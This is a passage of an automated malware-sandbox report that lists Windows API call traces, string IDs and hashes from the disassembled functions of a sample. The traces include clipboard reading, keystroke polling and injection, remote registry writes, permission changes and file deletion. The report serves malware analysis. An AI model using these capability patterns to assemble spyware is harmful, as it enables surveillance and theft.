                                                          • SendMessageW.USER32(?,00001012,00000000,?), ref: 003CD18D
                                                          • SendMessageW.USER32 ref: 003CD1BE
                                                          • ClientToScreen.USER32(?,?), ref: 003CD21C
                                                          • TrackPopupMenuEx.USER32(?,00000000,?,?,?,00000000), ref: 003CD24C
                                                          • SendMessageW.USER32(?,00001111,00000000,?), ref: 003CD276
                                                          • SendMessageW.USER32 ref: 003CD299
                                                          • ClientToScreen.USER32(?,?), ref: 003CD2EB
                                                          • TrackPopupMenuEx.USER32(?,00000080,?,?,?,00000000), ref: 003CD31F
                                                            • Part of subcall function 003425DB: GetWindowLongW.USER32(?,000000EB), ref: 003425EC
                                                          • GetWindowLongW.USER32(?,000000F0), ref: 003CD3BB
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$ClientScreen$ImageLongWindow$CursorDragList_State$CaptureMenuPopupTrack$BeginEnterInvalidateParentProcRectRelease_wcsncpy
                                                          • String ID: @GUI_DRAGID$F$pb@
                                                          • API String ID: 3977979337-1958197849
                                                          APIs
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$_memset
                                                          • String ID: ]?$DEFINE$Oa5$P\?$Q\E$[:<:]]$[:>:]]$\b(?<=\w)$\b(?=\w)
                                                          • API String ID: 1357608183-1541983792
                                                          APIs
                                                          • GetForegroundWindow.USER32(00000000,?), ref: 00344A3D
                                                          • FindWindowW.USER32(Shell_TrayWnd,00000000), ref: 0037D9BE
                                                          • IsIconic.USER32(?), ref: 0037D9C7
                                                          • ShowWindow.USER32(?,00000009), ref: 0037D9D4
                                                          • SetForegroundWindow.USER32(?), ref: 0037D9DE
                                                          • GetWindowThreadProcessId.USER32(00000000,00000000), ref: 0037D9F4
                                                          • GetCurrentThreadId.KERNEL32 ref: 0037D9FB
                                                          • GetWindowThreadProcessId.USER32(?,00000000), ref: 0037DA07
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037DA18
                                                          • AttachThreadInput.USER32(?,00000000,00000001), ref: 0037DA20
                                                          • AttachThreadInput.USER32(00000000,?,00000001), ref: 0037DA28
                                                          • SetForegroundWindow.USER32(?), ref: 0037DA2B
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA40
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA4B
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA55
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA5A
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA63
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA68
                                                          • MapVirtualKeyW.USER32(00000012,00000000), ref: 0037DA72
                                                          • keybd_event.USER32(00000012,00000000), ref: 0037DA77
                                                          • SetForegroundWindow.USER32(?), ref: 0037DA7A
                                                          • AttachThreadInput.USER32(?,?,00000000), ref: 0037DAA1
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Window$Thread$AttachForegroundInputVirtualkeybd_event$Process$CurrentFindIconicShow
                                                          • String ID: Shell_TrayWnd
                                                          • API String ID: 4125248594-2988720461
                                                          APIs
                                                          • OpenClipboard.USER32(003CF910), ref: 003B40A6
                                                          • IsClipboardFormatAvailable.USER32(0000000D), ref: 003B40B4
                                                          • GetClipboardData.USER32(0000000D), ref: 003B40BC
                                                          • CloseClipboard.USER32 ref: 003B40C8
                                                          • GlobalLock.KERNEL32(00000000), ref: 003B40E4
                                                          • CloseClipboard.USER32 ref: 003B40EE
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003B4103
                                                          • IsClipboardFormatAvailable.USER32(00000001), ref: 003B4110
                                                          • GetClipboardData.USER32(00000001), ref: 003B4118
                                                          • GlobalLock.KERNEL32(00000000), ref: 003B4125
                                                          • GlobalUnlock.KERNEL32(00000000), ref: 003B4159
                                                          • CloseClipboard.USER32 ref: 003B4269
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Clipboard$Global$Close$AvailableDataFormatLockUnlock$Open
                                                          • String ID:
                                                          • API String ID: 3222323430-0
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003AC819
                                                          • FindClose.KERNEL32(00000000), ref: 003AC86D
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC892
                                                          • FileTimeToLocalFileTime.KERNEL32(?,?), ref: 003AC8A9
                                                          • FileTimeToSystemTime.KERNEL32(?,?), ref: 003AC8D0
                                                          • __swprintf.LIBCMT ref: 003AC91C
                                                          • __swprintf.LIBCMT ref: 003AC95F
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • __swprintf.LIBCMT ref: 003AC9B3
                                                            • Part of subcall function 00363818: __woutput_l.LIBCMT ref: 00363871
                                                          • __swprintf.LIBCMT ref: 003ACA01
                                                            • Part of subcall function 00363818: __flsbuf.LIBCMT ref: 00363893
                                                            • Part of subcall function 00363818: __flsbuf.LIBCMT ref: 003638AB
                                                          • __swprintf.LIBCMT ref: 003ACA50
                                                          • __swprintf.LIBCMT ref: 003ACA9F
                                                          • __swprintf.LIBCMT ref: 003ACAEE
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: __swprintf$FileTime$FindLocal__flsbuf$CloseFirstSystem__woutput_l_memmove
                                                          • String ID: %02d$%4d$%4d%02d%02d%02d%02d%02d
                                                          • API String ID: 3953360268-2428617273
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003AF042
                                                          • _wcscmp.LIBCMT ref: 003AF057
                                                          • _wcscmp.LIBCMT ref: 003AF06E
                                                          • GetFileAttributesW.KERNEL32(?), ref: 003AF080
                                                          • SetFileAttributesW.KERNEL32(?,?), ref: 003AF09A
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003AF0B2
                                                          • FindClose.KERNEL32(00000000), ref: 003AF0BD
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF0D9
                                                          • _wcscmp.LIBCMT ref: 003AF100
                                                          • _wcscmp.LIBCMT ref: 003AF117
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF129
                                                          • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF147
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF151
                                                          • FindClose.KERNEL32(00000000), ref: 003AF15E
                                                          • FindClose.KERNEL32(00000000), ref: 003AF170
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                          • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                          • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$AttributesCurrentDirectoryFirstNext
                                                          • String ID: *.*
                                                          • API String ID: 1803514871-438819550
                                                          • Opcode ID: 0c78464077f6da4d0eddfb950f7a800ab541a905d5b23d691751fe506d0dbbb0
                                                          • Instruction ID: 896e97b366723f2fe9f358e4c593ac06553202c51991578d5bb882125dceae37
                                                          • Opcode Fuzzy Hash: 0c78464077f6da4d0eddfb950f7a800ab541a905d5b23d691751fe506d0dbbb0
                                                          • Instruction Fuzzy Hash: B531BF76500219AEDB12EBB4DC89EEE77ACDF4A320F104175E805E31A0EB70EE45CB64
                                                          APIs
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C09DE
                                                          • RegCreateKeyExW.ADVAPI32(?,?,00000000,003CF910,00000000,?,00000000,?,?), ref: 003C0A4C
                                                          • RegCloseKey.ADVAPI32(00000000,00000001,00000000,00000000,00000000), ref: 003C0A94
                                                          • RegSetValueExW.ADVAPI32(00000001,?,00000000,00000002,?), ref: 003C0B1D
                                                          • RegCloseKey.ADVAPI32(?), ref: 003C0E3D
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C0E4A
                                                          Similarity
                                                          • API ID: Close$ConnectCreateRegistryValue
                                                          • String ID: REG_BINARY$REG_DWORD$REG_EXPAND_SZ$REG_MULTI_SZ$REG_QWORD$REG_SZ
                                                          • API String ID: 536824911-966354055
                                                          • Opcode ID: 8120dbdc7caff31b3302f16620e6b708f3267e8ac4dda85adb0e19ec424c8873
                                                          • Instruction ID: 88b0a5c187cc25999ee1e349ea5954de9938a3db331e512b29bc4274d06a2330
                                                          • Opcode Fuzzy Hash: 8120dbdc7caff31b3302f16620e6b708f3267e8ac4dda85adb0e19ec424c8873
                                                          • Instruction Fuzzy Hash: DF0225752046519FCB16EF24C895E2AB7E9AF88714F05885DF89A9F362CB30ED04CB81
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0D>$0E>$0F>$ANY)$ANYCRLF)$BSR_ANYCRLF)$BSR_UNICODE)$CR)$CRLF)$LF)$LIMIT_MATCH=$LIMIT_RECURSION=$NO_AUTO_POSSESS)$NO_START_OPT)$Oa5$UCP)$UTF)$UTF16)$pG>
                                                          • API String ID: 0-1832422051
                                                          • Opcode ID: e21bd53beea1013bf31a40498eab49bee714273033f0fe63c33f865bd107647c
                                                          • Instruction ID: f6e45edc104555b50deea9be2ffe1b75adb0bb1053f43164f3793ac7e43a02b9
                                                          • Opcode Fuzzy Hash: e21bd53beea1013bf31a40498eab49bee714273033f0fe63c33f865bd107647c
                                                          • Instruction Fuzzy Hash: 3C727075E0021A9BDF26CF59C841BAEB7F5FF48310F55816AE805EB690EB309D45CB90
                                                          APIs
                                                          • FindFirstFileW.KERNEL32(?,?,774C8FB0,?,00000000), ref: 003AF19F
                                                          • _wcscmp.LIBCMT ref: 003AF1B4
                                                          • _wcscmp.LIBCMT ref: 003AF1CB
                                                            • Part of subcall function 003A43C6: CreateFileW.KERNEL32(?,40000000,00000001,00000000,00000003,02000080,00000000), ref: 003A43E1
                                                          • FindNextFileW.KERNEL32(00000000,?), ref: 003AF1FA
                                                          • FindClose.KERNEL32(00000000), ref: 003AF205
                                                          • FindFirstFileW.KERNEL32(*.*,?), ref: 003AF221
                                                          • _wcscmp.LIBCMT ref: 003AF248
                                                          • _wcscmp.LIBCMT ref: 003AF25F
                                                          • SetCurrentDirectoryW.KERNEL32(?), ref: 003AF271
                                                          • SetCurrentDirectoryW.KERNEL32(003F8920), ref: 003AF28F
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003AF299
                                                          • FindClose.KERNEL32(00000000), ref: 003AF2A6
                                                          • FindClose.KERNEL32(00000000), ref: 003AF2B8
                                                          Similarity
                                                          • API ID: Find$File$_wcscmp$Close$CurrentDirectoryFirstNext$Create
                                                          • String ID: *.*
                                                          • API String ID: 1824444939-438819550
                                                          • Opcode ID: c35a5bf9ac5e15855553bf0ce6c8fbec50b571dfe83dfc52a43b23e0b62f5ebc
                                                          • Instruction ID: 33531ccea6fd2abd28dd9682f5910ec1a9b34e01e59551bf4d3200db9bfc6419
                                                          • Opcode Fuzzy Hash: c35a5bf9ac5e15855553bf0ce6c8fbec50b571dfe83dfc52a43b23e0b62f5ebc
                                                          • Instruction Fuzzy Hash: 2C31CE3A9002196ECB22ABA4EC88FEE73ADDF46324F104675E800E31A0DB70DE45CB54
                                                          APIs
                                                          • GetFullPathNameW.KERNEL32(?,00007FFF,?,?), ref: 003AA299
                                                          • __swprintf.LIBCMT ref: 003AA2BB
                                                          • CreateDirectoryW.KERNEL32(?,00000000), ref: 003AA2F8
                                                          • CreateFileW.KERNEL32(?,40000000,00000000,00000000,00000003,02200000,00000000), ref: 003AA31D
                                                          • _memset.LIBCMT ref: 003AA33C
                                                          • _wcsncpy.LIBCMT ref: 003AA378
                                                          • DeviceIoControl.KERNEL32(00000000,000900A4,?,?,00000000,00000000,?,00000000), ref: 003AA3AD
                                                          • CloseHandle.KERNEL32(00000000), ref: 003AA3B8
                                                          • RemoveDirectoryW.KERNEL32(?), ref: 003AA3C1
                                                          • CloseHandle.KERNEL32(00000000), ref: 003AA3CB
                                                          Similarity
                                                          • API ID: CloseCreateDirectoryHandle$ControlDeviceFileFullNamePathRemove__swprintf_memset_wcsncpy
                                                          • String ID: :$\$\??\%s
                                                          • API String ID: 2733774712-3457252023
                                                          • Opcode ID: 3fdb793d47d7c2c1313ff2b59e416555d0c500aa4cfbf39477ef49e9fc852e3e
                                                          • Instruction ID: 04daeebb2ed8f19010c736268f73ece76e0ea68df65b941aa3c0b8d80936a2de
                                                          • Opcode Fuzzy Hash: 3fdb793d47d7c2c1313ff2b59e416555d0c500aa4cfbf39477ef49e9fc852e3e
                                                          • Instruction Fuzzy Hash: A131C3B6500109ABDB22DFA0DC49FEB77BDEF89700F1041B6F908D60A0E774A644CB24
                                                          APIs
                                                            • Part of subcall function 0039852A: GetUserObjectSecurity.USER32(?,00000004,?,00000000,?), ref: 00398546
                                                            • Part of subcall function 0039852A: GetLastError.KERNEL32(?,0039800A,?,?,?), ref: 00398550
                                                            • Part of subcall function 0039852A: GetProcessHeap.KERNEL32(00000008,?,?,0039800A,?,?,?), ref: 0039855F
                                                            • Part of subcall function 0039852A: HeapAlloc.KERNEL32(00000000,?,0039800A,?,?,?), ref: 00398566
                                                            • Part of subcall function 0039852A: GetUserObjectSecurity.USER32(?,00000004,00000000,?,?), ref: 0039857D
                                                            • Part of subcall function 003985C7: GetProcessHeap.KERNEL32(00000008,00398020,00000000,00000000,?,00398020,?), ref: 003985D3
                                                            • Part of subcall function 003985C7: HeapAlloc.KERNEL32(00000000,?,00398020,?), ref: 003985DA
                                                            • Part of subcall function 003985C7: InitializeSecurityDescriptor.ADVAPI32(00000000,00000001,?,00398020,?), ref: 003985EB
                                                          • GetSecurityDescriptorDacl.ADVAPI32(?,?,?,?), ref: 00398238
                                                          • _memset.LIBCMT ref: 0039824D
                                                          • GetAclInformation.ADVAPI32(?,?,0000000C,00000002), ref: 0039826C
                                                          • GetLengthSid.ADVAPI32(?), ref: 0039827D
                                                          • GetAce.ADVAPI32(?,00000000,?), ref: 003982BA
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,?,?), ref: 003982D6
                                                          • GetLengthSid.ADVAPI32(?), ref: 003982F3
                                                          • GetProcessHeap.KERNEL32(00000008,-00000008), ref: 00398302
                                                          • HeapAlloc.KERNEL32(00000000), ref: 00398309
                                                          • GetLengthSid.ADVAPI32(?,00000008,?), ref: 0039832A
                                                          • CopySid.ADVAPI32(00000000), ref: 00398331
                                                          • AddAce.ADVAPI32(?,00000002,000000FF,00000000,?), ref: 00398362
                                                          • SetSecurityDescriptorDacl.ADVAPI32(?,00000001,?,00000000), ref: 00398388
                                                          • SetUserObjectSecurity.USER32(?,00000004,?), ref: 0039839C
                                                          Similarity
                                                          • API ID: HeapSecurity$AllocDescriptorLengthObjectProcessUser$Dacl$CopyErrorInformationInitializeLast_memset
                                                          • String ID:
                                                          • API String ID: 3996160137-0
                                                          • Opcode ID: 7528058ec5eef340f06f230257d120f23bb65ba7371448135322245ab5fff8d6
                                                          • Instruction ID: 6af77d518fa14db06d672fc8b60d6e50bc5667870e17c4d35429016608401698
                                                          • Opcode Fuzzy Hash: 7528058ec5eef340f06f230257d120f23bb65ba7371448135322245ab5fff8d6
                                                          • Instruction Fuzzy Hash: 7A616B7590021AEFDF128FA4DC84EEEBB79FF46700F448229E915E6291DB319A05CB60
                                                          APIs
                                                            • Part of subcall function 003C0EA5: CharUpperBuffW.USER32(?,?,?,?,?,?,?,003BFE38,?,?), ref: 003C0EBC
                                                          • RegConnectRegistryW.ADVAPI32(?,?,?), ref: 003C0537
                                                            • Part of subcall function 00349997: __itow.LIBCMT ref: 003499C2
                                                            • Part of subcall function 00349997: __swprintf.LIBCMT ref: 00349A0C
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,?,00000000,?), ref: 003C05D6
                                                          • RegQueryValueExW.ADVAPI32(?,?,00000000,00000000,?,00000008), ref: 003C066E
                                                          • RegCloseKey.ADVAPI32(000000FE,000000FE,00000000,?,00000000), ref: 003C08AD
                                                          • RegCloseKey.ADVAPI32(00000000), ref: 003C08BA
                                                          Similarity
                                                          • API ID: CloseQueryValue$BuffCharConnectRegistryUpper__itow__swprintf
                                                          • String ID:
                                                          • API String ID: 1240663315-0
                                                          • Opcode ID: ca7e9ea5eca43d6ec0f123613595fc0b8b33823afbcc759157fc802da7631767
                                                          • Instruction ID: 5cabba616a83789c6a5849bfaf5ce9a86870238255d00982eaa5e95f9cecbd0f
                                                          • Opcode Fuzzy Hash: ca7e9ea5eca43d6ec0f123613595fc0b8b33823afbcc759157fc802da7631767
                                                          • Instruction Fuzzy Hash: 07E12D31604210EFCB1ADF24C895E6ABBE9EF89714F04856DF899DB262DB30ED05CB51
                                                          Similarity
                                                          • API ID:
                                                          • String ID: 0D>$0D>$ERCP$Oa5$VUUU$VUUU$VUUU$VUUU
                                                          • API String ID: 0-1609675879
                                                          • Opcode ID: 4ab096eadf319b0f7b8fc69f2366826a207c9651ab78164291c466da012a4f73
                                                          • Instruction ID: 9013f548ad253ce0add71c95888ddd402b0a753f5b51a5a9513677e4b8db88bf
                                                          • Opcode Fuzzy Hash: 4ab096eadf319b0f7b8fc69f2366826a207c9651ab78164291c466da012a4f73
                                                          • Instruction Fuzzy Hash: 1FA2A270E0421ACBDF2ADF58C940BADB7B2BB44319F2581A9DC59A7690D7309EC9CF50
                                                          APIs
                                                          • GetKeyboardState.USER32(?), ref: 003A0062
                                                          • GetAsyncKeyState.USER32(000000A0), ref: 003A00E3
                                                          • GetKeyState.USER32(000000A0), ref: 003A00FE
                                                          • GetAsyncKeyState.USER32(000000A1), ref: 003A0118
                                                          • GetKeyState.USER32(000000A1), ref: 003A012D
                                                          • GetAsyncKeyState.USER32(00000011), ref: 003A0145
                                                          • GetKeyState.USER32(00000011), ref: 003A0157
                                                          • GetAsyncKeyState.USER32(00000012), ref: 003A016F
                                                          • GetKeyState.USER32(00000012), ref: 003A0181
                                                          • GetAsyncKeyState.USER32(0000005B), ref: 003A0199
                                                          • GetKeyState.USER32(0000005B), ref: 003A01AB
                                                          Similarity
                                                          • API ID: State$Async$Keyboard
                                                          • String ID:
                                                          • API String ID: 541375521-0
                                                          • Opcode ID: 4ab9b4c5fdda795f2c2e05ac36f3feec72ba8e3578766fc6906b8ca94739222a
                                                          • Instruction ID: 00fad3b62212214259c1a43eefd3666157933706060dce5e3b42b00d161817e4
                                                          • Opcode Fuzzy Hash: 4ab9b4c5fdda795f2c2e05ac36f3feec72ba8e3578766fc6906b8ca94739222a
                                                          • Instruction Fuzzy Hash: DA41D9386047CA6DFF3B8B608C547F5BEA5EF13344F094099D6C6465C2EBA499C8C7A2
                                                          Similarity
                                                          • API ID: Clipboard$AllocCloseEmptyGlobalOpen
                                                          • String ID:
                                                          • API String ID: 1737998785-0
                                                          • Opcode ID: c21e1e3ff16bf19057bc4ec5a246a15d5182bb1da8518b836785fd181657815d
                                                          • Instruction ID: 4505bc079e07d3e3c9692db560cc6cadd0f4f37c18663cb12a290f9395d82ca8
                                                          • Opcode Fuzzy Hash: c21e1e3ff16bf19057bc4ec5a246a15d5182bb1da8518b836785fd181657815d
                                                          • Instruction Fuzzy Hash: 35217C392006109FDB12AF64DC49F6E77A9EF48715F14802AF946DF6A2DB34AC108B58
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003A38E7
                                                          • DeleteFileW.KERNEL32(?,?,00000000,?,?,?,?), ref: 003A398F
                                                          • MoveFileW.KERNEL32(?,?), ref: 003A39A2
                                                          • DeleteFileW.KERNEL32(?,?,?,?,?), ref: 003A39BF
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A39E1
                                                          • FindClose.KERNEL32(00000000,?,?,?,?), ref: 003A39FD
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: File$Find$Delete$AttributesCloseFirstFullMoveNameNextPath
                                                          • String ID: \*.*
                                                          • API String ID: 4002782344-1173974218
                                                          • Opcode ID: a3c790e5d76a39766175b466d1ebc708a34883670da9b37783877db8f108da28
                                                          • Instruction ID: 258b34316ad785e90792c0952bfc49ec316d9986998b453a95dc3b8259a19dc8
                                                          • Opcode Fuzzy Hash: a3c790e5d76a39766175b466d1ebc708a34883670da9b37783877db8f108da28
                                                          • Instruction Fuzzy Hash: BE514D318051589ECB17EBA0DD929EEB7B9EF16300F644169F442BB192EF716F09CB60
                                                          APIs
                                                            • Part of subcall function 00347F41: _memmove.LIBCMT ref: 00347F82
                                                          • FindFirstFileW.KERNEL32(?,?,*.*,?,?,00000000,00000000), ref: 003AF4CC
                                                          • Sleep.KERNEL32(0000000A), ref: 003AF4FC
                                                          • _wcscmp.LIBCMT ref: 003AF510
                                                          • _wcscmp.LIBCMT ref: 003AF52B
                                                          • FindNextFileW.KERNEL32(?,?), ref: 003AF5C9
                                                          • FindClose.KERNEL32(00000000), ref: 003AF5DF
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: Find$File_wcscmp$CloseFirstNextSleep_memmove
                                                          • String ID: *.*
                                                          • API String ID: 713712311-438819550
                                                          • Opcode ID: 67871bd2cb7bf4d39e2c8ff7e11eff4433a905b8e1c063b5002d4deb4cb368a4
                                                          • Instruction ID: eb741a939d606f737b1cb790b205080f1a15a41182cd533c3c51c2819fd7be58
                                                          • Opcode Fuzzy Hash: 67871bd2cb7bf4d39e2c8ff7e11eff4433a905b8e1c063b5002d4deb4cb368a4
                                                          • Instruction Fuzzy Hash: 29415175D0121AAFCF16DFA4CC45AEEBBB8FF06310F144566E815A71A1EB30AE44CB50
                                                          APIs
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove
                                                          • String ID:
                                                          • API String ID: 4104443479-0
                                                          • Opcode ID: 0ee13a15e6e68e50db614941b6206b279dbadc7e8c30a7363ef406e3ccf64e72
                                                          • Instruction ID: 70a8d654e0fdc3e8484508f1475e0b36188e3fb70def9ac633f5852421dac542
                                                          • Opcode Fuzzy Hash: 0ee13a15e6e68e50db614941b6206b279dbadc7e8c30a7363ef406e3ccf64e72
                                                          • Instruction Fuzzy Hash: 0D12AF70A00609DFDF1ADFA5C991AEEB7F9FF48300F104529E806AB261EB35AD15CB50
                                                          APIs
                                                            • Part of subcall function 00360F36: std::exception::exception.LIBCMT ref: 00360F6C
                                                            • Part of subcall function 00360F36: __CxxThrowException@8.LIBCMT ref: 00360F81
                                                          • _memmove.LIBCMT ref: 003905AE
                                                          • _memmove.LIBCMT ref: 003906C3
                                                          • _memmove.LIBCMT ref: 0039076A
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
                                                          Similarity
                                                          • API ID: _memmove$Exception@8Throwstd::exception::exception
                                                          • String ID: yZ5
                                                          • API String ID: 1300846289-2995190576
                                                          • Opcode ID: d6a527a734f2f1226c1b0461c116167dfc78fd0c95fabc5e9a8dbfc0419e65f2
                                                          • Instruction ID: edff42a4b2019b5db41139c6486ba847dc6e7a8153172f01d396e7baf5fb8232
                                                          • Opcode Fuzzy Hash: d6a527a734f2f1226c1b0461c116167dfc78fd0c95fabc5e9a8dbfc0419e65f2
                                                          • Instruction Fuzzy Hash: EC02C170A00209DFCF0ADF64D992AAE7BF9EF44310F158069E806EF255EB31E955CB90
                                                          APIs
                                                            • Part of subcall function 003448AE: GetFullPathNameW.KERNEL32(?,00007FFF,?,00000000,?,?,003448A1,?,?,003437C0,?), ref: 003448CE
                                                            • Part of subcall function 003A4AD8: GetFileAttributesW.KERNEL32(?,003A374F), ref: 003A4AD9
                                                          • FindFirstFileW.KERNEL32(?,?), ref: 003A3BCD
                                                          • DeleteFileW.KERNEL32(?,?,?,?), ref: 003A3C1D
                                                          • FindNextFileW.KERNEL32(00000000,00000010), ref: 003A3C2E
                                                          • FindClose.KERNEL32(00000000), ref: 003A3C45
                                                          • FindClose.KERNEL32(00000000), ref: 003A3C4E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000002.00000002.1304288987.0000000000341000.00000020.00000001.01000000.00000004.sdmp, Offset: 00340000, based on PE: true
                                                           • Associated: 00000002.00000002.1304269843.0000000000340000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003CF000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304342779.00000000003F4000.00000002.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304382803.00000000003FE000.00000004.00000001.01000000.00000004.sdmp
                                                           • Associated: 00000002.00000002.1304408388.0000000000407000.00000002.00000001.01000000.00000004.sdmp
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_2_2_340000_RO2Y11yOJ7.jbxd
